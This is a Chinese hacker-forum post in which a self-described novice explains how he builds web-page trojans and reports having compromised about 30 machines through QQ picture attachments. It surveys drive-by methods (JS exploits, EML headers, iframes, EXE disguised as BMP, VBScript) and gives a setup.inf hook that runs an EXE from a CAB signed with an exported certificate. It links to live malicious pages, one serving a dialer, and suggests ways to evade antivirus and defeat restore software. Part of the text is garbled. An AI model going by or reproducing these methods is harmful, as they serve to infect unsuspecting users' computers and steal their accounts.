菜鸟学做页面木马

要知道“大虾走门，菜鸟走窗”我说的。我是个菜菜鸟所以我知道这一
点，我是靠送别人礼物让她开窗来完成进入她家的。不像那些大虾直接进出
不用送东东，我有QQ发给“好友”带木的照片来完成进入，再由她机器收到
的QQ在发… 好累!有了些成就好像最多时有30多个肉鸡，但免费的空间要收
费了(免费餐不多了)几个星期的心血白费。主要是没有时间，还好上黑白上
看到了网页木马-图片木马，对我这样的菜鸟来说就是个天大的好事，放到网
页上成功。什么还有EML头啊太好了不用自己动手全搞定。时之不常我的肉鸡
又由多变少了为什么呢!到网吧一试才知道这全过时了，网吧装了金山防火和
还原精灵，一上网页就杀之!怎么办只有自己动手了!
 
(一)首先我想了想自己知道的网页木马的优点和不足：
 　
 　一，JS.Exception.EXploit
 　　 “雪峰，我的首页被改，桌面被…”QQ上的好友向我求救，“老大，和
 　　　你学了这么多年电脑怎么还在网虫的页上被黑，告诉你上黑白上学学吧
 　　　 要不千万别上菜鸟页上玩，要不会死的”

 　二，EML头
 　　　“小弟前些天给我的QQ全没了”，“黑鸟大哥十几个全没了不会吧是不
 　　　 是你的机器…”打车前去看了看，发现TEMP里有个EXE名为QQpass这不
 　　　 是收QQ的东东，虽没用过非它不过了。“大哥，你常写信吗”“不啊，
 　　　　为什么会被偷呢，我有防火墙呀是新买的”“不要让我来教你吧，你可
 　　　　是我的老师，亡羊补牢你不知道吗？防是在发毒发之后不多说了，你要
 　　　　 不打个补丁，要不就卸了收信程序吧”

 　 三，iframe
 　　　 漏洞也不太会用，但看介绍还好用。
 　
 　 四，.EXE to .BMP +　JS.Exception.EXploit
 　　　 这就是图片木马吧，但我不喜欢JS，这种网虫页里的东东防火墙叫个不
 　　　 停，还会驱走很多访客，黑下注册表肯定也会被人改回的，而后的.VBS
 　　　 还会有什么用呢，它是在下次开机才运行的。但我喜欢做这个.BMP的那
 　　　 个老师，原理是好的。(下面我用到了)

 　 *五，通过安全认证的CAB　， COX
 　　　　这使我这个菜菜鸟无能为力，百分百中招了，试求哪位大虾也帮我把我
 　　　　的文件上签个微软的大名要年头长些的，要不老过期。
 　　　
 　　　　 (在黑白上没看到这个源码，所以自己改过加上)
 　　　　原理：IE读文件时会有文件读不出，就会去“升级”这样它会在网页中指定的位置找 .cab
 　　　　并在系统里写入个CID读入.cab 里的文件。
 　　　　方法：.cab是WINDOWS里的压缩文件，我们知道IE里所用的安全文件是用签名的CAB也不例
外，所做的CAB是经过安全使用证书异入的。也就是说IE认证攻击，只所以每次都能
入侵我的脑，是因为它通过的是IE认证下的安全攻击，这样不管我怎么做都没办法。
制做方法：因本人水平有限（参）
软件：1.安全证书管理。2.CAB压缩或安装盘制做
先到，IE里找安全-内容，里面有证书，我们找一个就行。导出*.CER
在用证书管理打开*.CER导出证书.SPC和密钥.PVK。
这样我们就可以做.cab 了。
做一个setup.inf
 　　　 [Setup Hooks]
 　　　　hook1=hook1
 　　　　[hook1]
 　　　　run=%EXTRACT_DIR%\文件.exe

 　　　　[Version]
 　　　　Signature=$CHICAGO$
 　　　　AdvancedInf=2.0

最重要我所用的是安装盘制做，ADDsdtup.inf OR　文件.exe
 　　　 然后导入证书.SPC和密钥.PVK。
 　　　实例在我的免费空间上不过下载的是成人拔号器千万别点
 　　　　 (合法的签名)是安全的
 　　　 http://jzs.3322.net/live/index.html
 　　　
 　　六，VBScript
 　　　　我想这是很多病毒最爱用的了不用多说吧网页和文件常用的语言。
 　　
 　　七，综合所感优点组合
 　　　　iframe 成两个窗，其一为.BMP+VBScript
 　　　 其二为EML头的变种.mht(真对打了打补丁的不会做，可以用网页合并器合成)
 　　　　实例没试过成功的话在桌面上多个“女友������������爱������������你�
 　　　　����������.EXE”文件加长为的是不要她看到EXE。晕!图标没改以后在说。
 　　　　网址　 http://jzs.3322.net/inbb.htm
 　　　　　　　

 　　 总，试我的方法在自己机器上运行成功，只因时间有限源码没转成BMP，你可以
 　　　 自己转下，黑白上有不多说。我做的源码里没加RUN “文件路径”，如果加了
 　　　 就可以自动运行没有问题，对于网吧的还原精灵吗，有个还原精灵清除器很好用的。　　
(二)想像与求助　
 　　八，运用ASP因为它内置了VBS
 　　　　我想的不知道是不可行，因VBS功能很强大，但ASP内的VBS和文件里的有些
 　　　　差别不能放之就用，我又菜希望有人帮，自己做的可以改自己的注册表，但
 　　　　改别人的没试成(是不是我用的是自己的服务器呢别人的ASP空间不开脚本)　
 　　　　大虾帮我写个文章<<ASP做网页木马>>
 　　九，运用Flash的动作VBS
 　　　　看过6.0里好像可以但不太会，我想可行，如果帮我写我先谢了!
 　　十，以避防火，可以改下欢乐时光的源码
 　　　　这个不多说，您可能听过它是病毒了，它不比ActiveX，JS还可以碰到注册表
 　　　　那只不过是个脚本吗，欢乐时光是病毒防火全防在外的，没办法改改吧，谁让
 　　　　它用的原理好呢，我试过把它的13号发做删了(太毒了)但防火还防。如果大虾
 　　　　可以帮我上网下个源码吧，要不找我雪峰要也行我把写过的放到文尾。注意呀
 　　　　不要在自己的机器上试呀，我试了传染的几秒的事，整个系统呀，手工杀了我
 　　　　半个多小时，我没杀的软件。
 　　　　源文件：
（出处：viphot）

关键词：菜鸟学做页面木马